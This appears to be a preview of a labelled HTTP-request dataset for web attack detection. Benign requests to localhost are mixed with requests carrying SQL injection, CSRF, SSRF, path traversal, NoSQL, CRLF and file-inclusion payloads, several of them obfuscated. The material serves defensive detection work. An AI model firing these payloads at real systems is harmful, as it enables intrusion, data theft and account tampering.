GET /rest/products/search?q=%74%65%73%74%7C%7C%28%2F%2A%21%53%65%4C%65%63%74%2A%2F%43%68%72%28%37%39%29%7C%7C%43%68%72%28%31%30%30%29%7C%7C%43%68%72%28%31%30%38%29%7C%7C%43%68%72%28%31%31%31%29%2F%2A%21%66%52%6F%4D%2A%2F%2F%2A%21%64%55%41%6C%2A%2F%2F%2A%21%77%68%65%52%45%2A%2F%34%34%39%39%3D%34%34%39%39%2F%2A%21%61%4E%... | anomalous | SQL Injection |
GET /vulnerabilities/sqli/?id=<div style='display:none;'><form action="/delete-account" method="DELETE"><input type="hidden" name="authenticity_token" value="hacker%40evil.com'"><input type="hidden" name="user_id" value="promote"><input type="hidden" name="currency" value="admin"><input type="hidden" name="currency60" ... | anomalous | Cross-Site_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 4bd30bd6-c004-489a-92d3-7d5eea56eb71 | normal | null |
GET /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip | anomalous | Advanced Vulnerability Scan |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*... | anomalous | XML_External_Entity |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: file://2130706433:3389
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
A... | anomalous | Server-Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: bd73c316-2e62-492a-8f2a-ad31b9272cd3 | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*... | anomalous | Directory_Traversal |
GET /?ref=035e2a08-03df-45cb-9ffa-a26a5c8b6422&session_token=9549 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 035e2a08-03df-45... | normal | null |
GET /rest/products/search?q=$comment: 'MongoDB injection' // HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9... | anomalous | NoSQL_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a6e9a74f-fef0-4f4a-a503-c12075e53352 | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip,... | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: eb979361-4967-4b3f-997f-dd461e43d2d4 | normal | null |
GET /rest/products/search?q=/././+%0d%0a%20Set-Cookie:crlf=injection; Path=/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/... | anomalous | CRLF_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, g... | anomalous | Cross-Site_Request_Forgery |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: C:\logs\error_log
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept... | anomalous | Local_File_Inclusion |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, d... | anomalous | Local_File_Inclusion |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15';BEGIN DBMS_LOCK.SLEEP(5); END AND 'tYdV'='tYdV
Ref... | anomalous | SQL Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: bac6de8c-0158-443e-b363-8427e141a332 | normal | null |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: b3b273e3-9c00-4bd8-91c6-19077ae229b7 | normal | null |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 98df462c-7b56-4b5d-934f-0054b39ae7fc | normal | null |
GET /rest/products/search?q=gopher://127.1:8080/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,ima... | anomalous | Server-Side_Request_Forgery |
GET /portal/info.jsp HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip | anomalous | Advanced Vulnerability Scan |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1%27%20IN%20BOOLEAN%20MODE%29%20OR%20EXTRACTVALUE%281465%2CCONCAT%280x5c%2C0x717a6a7171%2C%28SELECT%20%28ELT%281465%3D1465%2C1%29%29%29%2C0x717a6b7871%29%29%23; security=low
User-Agent: Mozilla/5.0 ... | anomalous | SQL Injection |
GET /rest/products/search?q=glass&cache_id=ec2b3610-cdea-46ce-8a5a-5a93513c0310 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: ec... | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | XML_External_Entity |
POST /api/Feedbacks/ HTTP/1.1
Content-Length: 333
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Referer: http://localhost:3000/api/Feedbacks/
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Content-Type: applicati... | anomalous | SQL Injection |
End of preview. Expand in Data Studio
README.md exists but content is empty.
- Downloads last month
- 4